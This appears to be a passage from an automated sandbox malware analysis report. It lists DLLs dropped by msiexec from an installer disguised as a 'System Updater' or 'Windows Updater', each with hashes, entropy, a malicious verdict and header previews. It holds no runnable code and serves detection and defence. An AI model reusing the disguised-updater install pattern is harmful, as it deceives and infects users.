                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):808464
                                                                                                                                                                                                                                                                        Entropy (8bit):6.399509710294407
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:LPO8KYTJAJ5NqLaphV6mzFf3zLha2xqe4k+pqm8esHxYs265R3PPn70+8xM9:LG/pPhPzLM28e4UtHh5R3PPn70+8xM9
                                                                                                                                                                                                                                                                        MD5:DD1F93EB81E6C99BA9BE55B0C12E8BB4
                                                                                                                                                                                                                                                                        SHA1:1D767983AAA4EB5C9E19409CF529969142033850
                                                                                                                                                                                                                                                                        SHA-256:F55B853958F07B15F0DAE7A871C1EBE2EC117EF54BA3811D31CEC4C8AE471D9B
                                                                                                                                                                                                                                                                        SHA-512:7968839CA3E7337B2E7774D92C4A3666E9B7D8D76000475B39C2BDA6DB3320FC9B2100322505997798AF5631A007787FBD8D0D6FE0B51949C545C67E696AAF1A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......bu.2&..a&..a&..a.f.`+..a.f.`...aDl.`7..aDl.`>..aDl.`u..a.f.`>..a.f.`'..a.f.`;..a&..a...a.m.`h..a.m.`'..a.m(a'..a&.@a$..a.m.`'..aRich&..a........................PE..L.....gb.........."!.........R......................................................4/....@......................... ................................8..........p...H...p...............................@............................................text...x........................... ..`.rdata..0...........................@..@.data...@...........................@....rsrc................B..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):783784
                                                                                                                                                                                                                                                                        Entropy (8bit):6.388227283064485
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:JB0aQYpzr8qjh/Kf+UA0i6mjqBUBavHqNajAJLVxAKNYFglvqrr3m/Xz/b/cEV:v0ax050IUBeqkeVJYFCqrLm/Xz/b/cEV
                                                                                                                                                                                                                                                                        MD5:07DF9CA625C2CB953B2A7F7F699CEE7C
                                                                                                                                                                                                                                                                        SHA1:3225E84B51BA76EB650231C94231B70B70B997C9
                                                                                                                                                                                                                                                                        SHA-256:265D462E9BD3FC4BDF925590A852707A52E0707407FDC4BA40A468542E8DBB77
                                                                                                                                                                                                                                                                        SHA-512:104A32900AC3F7A3815CE4670AA430677EB48BD3B8A5E17F0A05C333B8FAF776756408784C8191EA51FFD54AD52D7FCBF2611570A275EFDC6BF1B04B5706F9FD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........p..[.y.[.y.[.y.Ozz.V.y.Oz|...y.7e}.J.y.7ez.L.y.7e|...y.Oz}.C.y.Oz..Z.y.Ozx.F.y.[.x.h.y.ep...y.ey.Z.y.e..Z.y.[...Y.y.e{.Z.y.Rich[.y.........................PE..L...].\`.........."!.........F............................................... ............@..........................M.......N....... .......................@..$...h5..p....................6.......5..@............................................text...h........................... ..`.rdata..............................@..@.data........`.......H..............@....rsrc........ ......................@..@.reloc..$....@......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):385960
                                                                                                                                                                                                                                                                        Entropy (8bit):6.405386710561945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vrDow+ZsrLg3bmfKlGzIqSqYf+SAOfVKE/M5TiyX:3owv43bqKlRHJVa9iyX
                                                                                                                                                                                                                                                                        MD5:D07DDD437009EBB9C21882579BF2DF0D
                                                                                                                                                                                                                                                                        SHA1:A24A636DB25ED29E5353FA5D274BF80C2AB8AD98
                                                                                                                                                                                                                                                                        SHA-256:C4F49B995E259A043AF81D987C6781B8736F5709348BB997EDAD183CCC396CAF
                                                                                                                                                                                                                                                                        SHA-512:8C845EC3EFFC0041DB3A550ADDDC1F175E1169CA00767C89D38FABAA59F97AE987B529C0AD71D0DEF0007A21FB3FD98200B0834408C5889D93F9EA035C60ECA3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{........................?.........................................................C......C.......C.............C.......Rich............PE..L.....\`.........."!................ZV....................................................@.........................`l......4t..........0........................>..8...p...............................@............... ............................text...O........................... ..`.rdata..............................@..@.data................x..............@....rsrc...0...........................@..@.reloc...>.......@..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):385960
                                                                                                                                                                                                                                                                        Entropy (8bit):6.405386710561945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vrDow+ZsrLg3bmfKlGzIqSqYf+SAOfVKE/M5TiyX:3owv43bqKlRHJVa9iyX
                                                                                                                                                                                                                                                                        MD5:D07DDD437009EBB9C21882579BF2DF0D
                                                                                                                                                                                                                                                                        SHA1:A24A636DB25ED29E5353FA5D274BF80C2AB8AD98
                                                                                                                                                                                                                                                                        SHA-256:C4F49B995E259A043AF81D987C6781B8736F5709348BB997EDAD183CCC396CAF
                                                                                                                                                                                                                                                                        SHA-512:8C845EC3EFFC0041DB3A550ADDDC1F175E1169CA00767C89D38FABAA59F97AE987B529C0AD71D0DEF0007A21FB3FD98200B0834408C5889D93F9EA035C60ECA3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{........................?.........................................................C......C.......C.............C.......Rich............PE..L.....\`.........."!................ZV....................................................@.........................`l......4t..........0........................>..8...p...............................@............... ............................text...O........................... ..`.rdata..............................@..@.data................x..............@....rsrc...0...........................@..@.reloc...>.......@..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):385960
                                                                                                                                                                                                                                                                        Entropy (8bit):6.405386710561945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vrDow+ZsrLg3bmfKlGzIqSqYf+SAOfVKE/M5TiyX:3owv43bqKlRHJVa9iyX
                                                                                                                                                                                                                                                                        MD5:D07DDD437009EBB9C21882579BF2DF0D
                                                                                                                                                                                                                                                                        SHA1:A24A636DB25ED29E5353FA5D274BF80C2AB8AD98
                                                                                                                                                                                                                                                                        SHA-256:C4F49B995E259A043AF81D987C6781B8736F5709348BB997EDAD183CCC396CAF
                                                                                                                                                                                                                                                                        SHA-512:8C845EC3EFFC0041DB3A550ADDDC1F175E1169CA00767C89D38FABAA59F97AE987B529C0AD71D0DEF0007A21FB3FD98200B0834408C5889D93F9EA035C60ECA3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{........................?.........................................................C......C.......C.............C.......Rich............PE..L.....\`.........."!................ZV....................................................@.........................`l......4t..........0........................>..8...p...............................@............... ............................text...O........................... ..`.rdata..............................@..@.data................x..............@....rsrc...0...........................@..@.reloc...>.......@..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):385960
                                                                                                                                                                                                                                                                        Entropy (8bit):6.405386710561945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vrDow+ZsrLg3bmfKlGzIqSqYf+SAOfVKE/M5TiyX:3owv43bqKlRHJVa9iyX
                                                                                                                                                                                                                                                                        MD5:D07DDD437009EBB9C21882579BF2DF0D
                                                                                                                                                                                                                                                                        SHA1:A24A636DB25ED29E5353FA5D274BF80C2AB8AD98
                                                                                                                                                                                                                                                                        SHA-256:C4F49B995E259A043AF81D987C6781B8736F5709348BB997EDAD183CCC396CAF
                                                                                                                                                                                                                                                                        SHA-512:8C845EC3EFFC0041DB3A550ADDDC1F175E1169CA00767C89D38FABAA59F97AE987B529C0AD71D0DEF0007A21FB3FD98200B0834408C5889D93F9EA035C60ECA3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{........................?.........................................................C......C.......C.............C.......Rich............PE..L.....\`.........."!................ZV....................................................@.........................`l......4t..........0........................>..8...p...............................@............... ............................text...O........................... ..`.rdata..............................@..@.data................x..............@....rsrc...0...........................@..@.reloc...>.......@..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):385960
                                                                                                                                                                                                                                                                        Entropy (8bit):6.405386710561945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vrDow+ZsrLg3bmfKlGzIqSqYf+SAOfVKE/M5TiyX:3owv43bqKlRHJVa9iyX
                                                                                                                                                                                                                                                                        MD5:D07DDD437009EBB9C21882579BF2DF0D
                                                                                                                                                                                                                                                                        SHA1:A24A636DB25ED29E5353FA5D274BF80C2AB8AD98
                                                                                                                                                                                                                                                                        SHA-256:C4F49B995E259A043AF81D987C6781B8736F5709348BB997EDAD183CCC396CAF
                                                                                                                                                                                                                                                                        SHA-512:8C845EC3EFFC0041DB3A550ADDDC1F175E1169CA00767C89D38FABAA59F97AE987B529C0AD71D0DEF0007A21FB3FD98200B0834408C5889D93F9EA035C60ECA3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{........................?.........................................................C......C.......C.............C.......Rich............PE..L.....\`.........."!................ZV....................................................@.........................`l......4t..........0........................>..8...p...............................@............... ............................text...O........................... ..`.rdata..............................@..@.data................x..............@....rsrc...0...........................@..@.reloc...>.......@..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):783784
                                                                                                                                                                                                                                                                        Entropy (8bit):6.388227283064485
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:JB0aQYpzr8qjh/Kf+UA0i6mjqBUBavHqNajAJLVxAKNYFglvqrr3m/Xz/b/cEV:v0ax050IUBeqkeVJYFCqrLm/Xz/b/cEV
                                                                                                                                                                                                                                                                        MD5:07DF9CA625C2CB953B2A7F7F699CEE7C
                                                                                                                                                                                                                                                                        SHA1:3225E84B51BA76EB650231C94231B70B70B997C9
                                                                                                                                                                                                                                                                        SHA-256:265D462E9BD3FC4BDF925590A852707A52E0707407FDC4BA40A468542E8DBB77
                                                                                                                                                                                                                                                                        SHA-512:104A32900AC3F7A3815CE4670AA430677EB48BD3B8A5E17F0A05C333B8FAF776756408784C8191EA51FFD54AD52D7FCBF2611570A275EFDC6BF1B04B5706F9FD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........p..[.y.[.y.[.y.Ozz.V.y.Oz|...y.7e}.J.y.7ez.L.y.7e|...y.Oz}.C.y.Oz..Z.y.Ozx.F.y.[.x.h.y.ep...y.ey.Z.y.e..Z.y.[...Y.y.e{.Z.y.Rich[.y.........................PE..L...].\`.........."!.........F............................................... ............@..........................M.......N....... .......................@..$...h5..p....................6.......5..@............................................text...h........................... ..`.rdata..............................@..@.data........`.......H..............@....rsrc........ ......................@..@.reloc..$....@......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):881064
                                                                                                                                                                                                                                                                        Entropy (8bit):6.445970518390351
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:p/NO9Ibn5dhulTll7VFv1/dSYKOC8fE/cod+I++qHfV5xJd9zlY:aKtulJl7VFv1lxKOC8fE/cod+j+qHfV8
                                                                                                                                                                                                                                                                        MD5:5A25FB13ED470B77EEFD2EB89CB62C47
                                                                                                                                                                                                                                                                        SHA1:3DBE567E3C8C8CD0F7E3C71A2536578EE11BF2A6
                                                                                                                                                                                                                                                                        SHA-256:0DCA4854897CA77080C57936AD5C7C6C5F5C656A5785C09C7D2C1D196E4F3336
                                                                                                                                                                                                                                                                        SHA-512:2EC64666AD42E955E91378AF855DA59D3BCFB4CC3574BF023DDA878C7D3E3DEC442625DE6E6B0434D1CAF86A525395B04038CF7FDC6C292405D9F19C6F4E9952
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j...............`......`.k........................`......`......`.....................................w............Rich....................PE..L.....\`.........."!................X.....................................................@.........................0...t............................X..............h...p..............................@............................................text...>........................... ..`.rdata..............................@..@.data...L...........................@....rsrc................f..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):783784
                                                                                                                                                                                                                                                                        Entropy (8bit):6.388227283064485
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:JB0aQYpzr8qjh/Kf+UA0i6mjqBUBavHqNajAJLVxAKNYFglvqrr3m/Xz/b/cEV:v0ax050IUBeqkeVJYFCqrLm/Xz/b/cEV
                                                                                                                                                                                                                                                                        MD5:07DF9CA625C2CB953B2A7F7F699CEE7C
                                                                                                                                                                                                                                                                        SHA1:3225E84B51BA76EB650231C94231B70B70B997C9
                                                                                                                                                                                                                                                                        SHA-256:265D462E9BD3FC4BDF925590A852707A52E0707407FDC4BA40A468542E8DBB77
                                                                                                                                                                                                                                                                        SHA-512:104A32900AC3F7A3815CE4670AA430677EB48BD3B8A5E17F0A05C333B8FAF776756408784C8191EA51FFD54AD52D7FCBF2611570A275EFDC6BF1B04B5706F9FD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........p..[.y.[.y.[.y.Ozz.V.y.Oz|...y.7e}.J.y.7ez.L.y.7e|...y.Oz}.C.y.Oz..Z.y.Ozx.F.y.[.x.h.y.ep...y.ey.Z.y.e..Z.y.[...Y.y.e{.Z.y.Rich[.y.........................PE..L...].\`.........."!.........F............................................... ............@..........................M.......N....... .......................@..$...h5..p....................6.......5..@............................................text...h........................... ..`.rdata..............................@..@.data........`.......H..............@....rsrc........ ......................@..@.reloc..$....@......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):385960
                                                                                                                                                                                                                                                                        Entropy (8bit):6.405386710561945
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:vrDow+ZsrLg3bmfKlGzIqSqYf+SAOfVKE/M5TiyX:3owv43bqKlRHJVa9iyX
                                                                                                                                                                                                                                                                        MD5:D07DDD437009EBB9C21882579BF2DF0D
                                                                                                                                                                                                                                                                        SHA1:A24A636DB25ED29E5353FA5D274BF80C2AB8AD98
                                                                                                                                                                                                                                                                        SHA-256:C4F49B995E259A043AF81D987C6781B8736F5709348BB997EDAD183CCC396CAF
                                                                                                                                                                                                                                                                        SHA-512:8C845EC3EFFC0041DB3A550ADDDC1F175E1169CA00767C89D38FABAA59F97AE987B529C0AD71D0DEF0007A21FB3FD98200B0834408C5889D93F9EA035C60ECA3
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........{........................?.........................................................C......C.......C.............C.......Rich............PE..L.....\`.........."!................ZV....................................................@.........................`l......4t..........0........................>..8...p...............................@............... ............................text...O........................... ..`.rdata..............................@..@.data................x..............@....rsrc...0...........................@..@.reloc...>.......@..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):549280
                                                                                                                                                                                                                                                                        Entropy (8bit):6.427674653470721
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:K/RT13b4ZhBQfjXqOsWSn6eT9tIeDL1/O3LXhG79VzzBtFeY:K/G2jaDWS6W9DzVzFtFeY
                                                                                                                                                                                                                                                                        MD5:8A9C0F9D818B0CF22B97045D78287E0E
                                                                                                                                                                                                                                                                        SHA1:EE5D606D27643799D52593A9AD762A7D701767A8
                                                                                                                                                                                                                                                                        SHA-256:960BBE57FD81273CD97C9AD5E67443EA13C7B93A252F43D81FD0D5D84B2864D1
                                                                                                                                                                                                                                                                        SHA-512:32B45008FEC09CB17AED1D7DA530FC7F89C8524676BB1AA6C3E5F6A7192B7F11240EB5B5B853A8201E06CDC35E47FB1D31D70BE80C6AD57B88062DCA2270E947
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`=G.$\).$\).$\).07*.)\).07,..\).H(-.5\).H(*.3\).H(,.k\).07-.<\).07..%\).07(.1\).$\(..])..( .g\)..().%\)..(.%\).$\..%\)..(+.%\).Rich$\).................PE..L...p.\`.........."!................................................................T.....@.......................................... ..h............H.......0...T..."..p...................."..........@...............h...<...@....................text...v........................... ..`.rdata..............................@..@.data...p...........................@....rsrc...h.... ......................@..@.reloc...T...0...V..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):783784
                                                                                                                                                                                                                                                                        Entropy (8bit):6.388227283064485
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:JB0aQYpzr8qjh/Kf+UA0i6mjqBUBavHqNajAJLVxAKNYFglvqrr3m/Xz/b/cEV:v0ax050IUBeqkeVJYFCqrLm/Xz/b/cEV
                                                                                                                                                                                                                                                                        MD5:07DF9CA625C2CB953B2A7F7F699CEE7C
                                                                                                                                                                                                                                                                        SHA1:3225E84B51BA76EB650231C94231B70B70B997C9
                                                                                                                                                                                                                                                                        SHA-256:265D462E9BD3FC4BDF925590A852707A52E0707407FDC4BA40A468542E8DBB77
                                                                                                                                                                                                                                                                        SHA-512:104A32900AC3F7A3815CE4670AA430677EB48BD3B8A5E17F0A05C333B8FAF776756408784C8191EA51FFD54AD52D7FCBF2611570A275EFDC6BF1B04B5706F9FD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........p..[.y.[.y.[.y.Ozz.V.y.Oz|...y.7e}.J.y.7ez.L.y.7e|...y.Oz}.C.y.Oz..Z.y.Ozx.F.y.[.x.h.y.ep...y.ey.Z.y.e..Z.y.[...Y.y.e{.Z.y.Rich[.y.........................PE..L...].\`.........."!.........F............................................... ............@..........................M.......N....... .......................@..$...h5..p....................6.......5..@............................................text...h........................... ..`.rdata..............................@..@.data........`.......H..............@....rsrc........ ......................@..@.reloc..$....@......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2872148
                                                                                                                                                                                                                                                                        Entropy (8bit):6.474766044699424
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:49152:sREYgPREYgwREYg4REYgNREYgmREYgdREYghREYgmREYg/REYgQREYgWREYgvREE:sRkRHR5RgRXRuRQRrRqRhRrR+RkRiIu
                                                                                                                                                                                                                                                                        MD5:64FCC75A6CE600B1E08183FAB01753B6
                                                                                                                                                                                                                                                                        SHA1:B383C12E3CFD29485B01ACE082223392C4559CF1
                                                                                                                                                                                                                                                                        SHA-256:9139B6EC98ABA90D8013CA785406455BC33B9CFBFA000B5D01E6CCD45D982756
                                                                                                                                                                                                                                                                        SHA-512:170DF453179DFD37CAEC15AFACFD7F7525D55107056480E1591D0E8DADC32D021DDAB4C193E33D8CBE4199FEACAD0B7AE040E319BAA0BCF94C1A850AAA7FA025
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@@t.W.@.....@.....@.....@.....@.....@......&.{13499434-9821-4E2D-B7DF-7C0867EB1504}..Windows Installer..System Updater.msi.@.....@.....@.....@......logo.exe..&.{F5D6D741-5AB0-4858-81E2-26A50610DFFA}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Installer......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{DECF3B3F-BFBA-4EB7-8878-E4C409356ABA}2.C:\Program Files (x86)\AW Manager\Windows Manager\.@.......@.....@.....@......&.{71730F5F-0233-4DB3-A1F2-B0AD0A1B831F}=.02:\Software\AdvancedWindowsManager\Windows Installer\Version.@.......@.....@.....@......&.{408CE191-A5E9-46B9-ADB0-4347C8FF9F0C}d.02:\Software\Caphyon\Advanced Installer\LZMA\{13499434-9821-4E2D-B7DF-7C0867EB1504}\5.0.3\AI_ExePath.@.......@.....@.....@......&.{58381363-55CC-4691-9CA4-9F7C23C7CB30}E.C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ex
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):143272
                                                                                                                                                                                                                                                                        Entropy (8bit):6.440876612680807
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:H58/uKIUAJJA/5M/imK+ikXI4SCedYKUbcChkjJMJeTY:ZUAwMqxKI4ezD2kE
                                                                                                                                                                                                                                                                        MD5:F09AEEB71101E834CB8227ED30B44C51
                                                                                                                                                                                                                                                                        SHA1:9D6AC4133148A65696993B0D84E18CEA990C740C
                                                                                                                                                                                                                                                                        SHA-256:E8BEFBC7D1594B993657C50444873EA974F0BB4F105AE45788D61D1620295FBE
                                                                                                                                                                                                                                                                        SHA-512:ED85F1213D6B6A68B037EC4B891305CD7D1F36E69C12D610823DDC33656F9D167FEA8CBABEA2CAE1D1D5B81320E432505A4DBC8780D816DD418A1BFFBD0403C5
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........g...4...4...4...5...4...5,..4..5...4..5...4..5...4...5...4...5...4...5...4...4...4|..5...4|..5...4|.D4...4..,4...4|..5...4Rich...4........PE..L.....\`.........."!.....h...................................................`............@.................................H...P....0..x....................@..........p...................@.......H...@...................<...@....................text....f.......h.................. ..`.rdata..x............l..............@..@.data...............................@....rsrc...x....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):180640
                                                                                                                                                                                                                                                                        Entropy (8bit):6.429027661829539
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:YZH1l2T9hr3rHIqtvIyipARFF2CXiaLSoksKaNv9AFs/P4P:c1ITfo4vyIEBaLg+AqHY
                                                                                                                                                                                                                                                                        MD5:FD8C6430420FBA8EE6FF671EC4CDCAE9
                                                                                                                                                                                                                                                                        SHA1:C762D4B2B4EFF9F5C2FC5B096F943A4299CBAE12
                                                                                                                                                                                                                                                                        SHA-256:806300BFFD0DF864F0EE180D64D2DB65AC2A86963E50CC5CEE3EAEBB6550B6BE
                                                                                                                                                                                                                                                                        SHA-512:92AE4374140C016B9CA2EEBA43D23B42D7323BABB2B255FC6CDC1BF5C9295EB13CC6027D8A2399FBF3A03C00CA081803336CEBAD8FA422087A5F8E31D00F5106
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
